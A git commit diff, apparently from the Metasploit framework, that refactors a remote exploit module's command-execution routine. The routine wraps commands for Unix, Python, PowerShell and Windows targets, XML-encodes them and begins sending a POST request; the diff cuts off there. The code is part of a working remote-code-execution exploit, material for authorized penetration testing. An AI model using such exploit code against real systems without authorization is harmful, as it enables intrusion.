Assign cmd to entire case and use encode for XML

Hat tip @acammack-r7. Forgot about that first syntax!
bug/bundler_fix
William Vu 2017-09-07 19:08:37 -05:00
parent 8f1e353b6e
commit a9a307540f
1 changed files with 7 additions and 9 deletions


@ -86,21 +86,19 @@ class MetasploitModule < Msf::Exploit::Remote
# #
def execute_command(cmd, opts = {}) def execute_command(cmd, opts = {})
case target.name cmd = case target.name
when /Unix/, /Linux/ when /Unix/, /Linux/
cmd = %W{/bin/sh -c #{cmd}} %W{/bin/sh -c #{cmd}}
when /Python/ when /Python/
cmd = %W{python -c #{cmd}} %W{python -c #{cmd}}
when /PowerShell/ when /PowerShell/
# This shit doesn't work yet %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
require 'pry'; binding.pry
cmd = %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
when /Windows/ when /Windows/
cmd = %W{cmd.exe /c #{cmd}} %W{cmd.exe /c #{cmd}}
end end
# Encode each command argument with HTML entities # Encode each command argument with XML entities
cmd.map! { |arg| Rex::Text.html_encode(arg) } cmd.map! { |arg| arg.encode(xml: :text) }
res = send_request_cgi( res = send_request_cgi(
'method' => 'POST', 'method' => 'POST',